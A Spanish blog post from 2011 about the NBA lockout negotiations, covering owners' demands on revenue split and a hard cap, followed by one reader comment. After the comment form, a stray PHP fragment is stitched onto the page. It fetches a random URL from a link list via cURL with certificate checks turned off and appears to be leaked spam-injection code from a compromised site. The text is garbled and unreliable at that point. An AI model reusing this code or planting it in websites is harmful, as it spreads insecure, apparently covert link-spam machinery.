Lockout: modo negociación ON

14 de September de 2011 por Jose_Dantley

Los primeros 60 días de lockout se caracterizaron por el silencio. Las partes no hablaban entre ellas más que a cuentagotas. Sindicato de jugadores y propietarios parecían pensar que el tiempo jugaba a su favor en cuanto a poder negociador. Se podría pensar que los bolsillos de los propietarios son más profundos pero, por otro lado, algunos jugadores habían abierto la vía de jugar en Europa o en China. Lo que sí que es innegable es que independientemente de quién pudiera aguantar más tiempo, ambas partes sufrirían pérdidas considerables de no haber liga.

Con los supuestos partidos de pretemporada a la vuelta de la esquina y los primeros cheques cerca de no cobrarse –el primer pago a los jugadores suele ser a finales de octubre o en la primera quincena de noviembre-, no podían estar jugando a ser James Dean en “Rebelde sin causa” sin riesgo de estrellarse seriamente.

De manera muy resumida, el lockout lo provocan los propietarios de las franquicias alegando que el 57% de ingresos que reciben los jugadores es excesivo y está ocasionando pérdidas muy serias en la mayor parte de los equipos. Su propuesta inicial era llegar a un reparto 50/50 que los jugadores rechazaron de plano. Ese 7% de diferencia representan unos 300 millones de dólares anuales, 10 millones por equipo de media, 1 millón de media por jugador. Aunque ya se sabe que el problema de tratar con medias es confundir el problema financiero que pudiera tener una franquicia de bolsillos profundos como Dallas con otra tan débil como New Orleans, cuyo propietario es la propia NBA. Igualmente, no será el mismo problema financiero el de Kobe Bryant que el de un jugador profundo de banquillo.

Los propietarios también buscaban un par de puntos clave para acotar los costes. En concreto, llegaron a proponer un hard cap o límite salarial inflexible que impediría que el coste de las plantillas se disparara en oposición al límite flexible que existe en la actualidad y que permite a los equipos renovar a jugadores de peso aún a costa de pasarse de manera notable del límite. Parece complicado que el sindicato de jugadores lo acepte.

Las buenas noticias son que se sientan a negociar. Al fin las reuniones parecen ser reuniones de trabajo, no de marcar el territorio. De momento no han trascendido propuestas específicas en esta ronda de negociaciones salvo temas menores como la posible introducción de una tercera ronda del draft.

La pregunta obvia es: ¿habrá liga? Nadie se atreve a dar una respuesta. Quizá en el transcurso de la semana podamos tener más pistas para responderla.

Comenta

Un comentario a esta entrada

  1. Joaq dice:
    #1

    Recien me entero que si la NBA n ose abre, Ginobili se va para Kinder Bologna. Asi y otros más a Europa y mamita…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>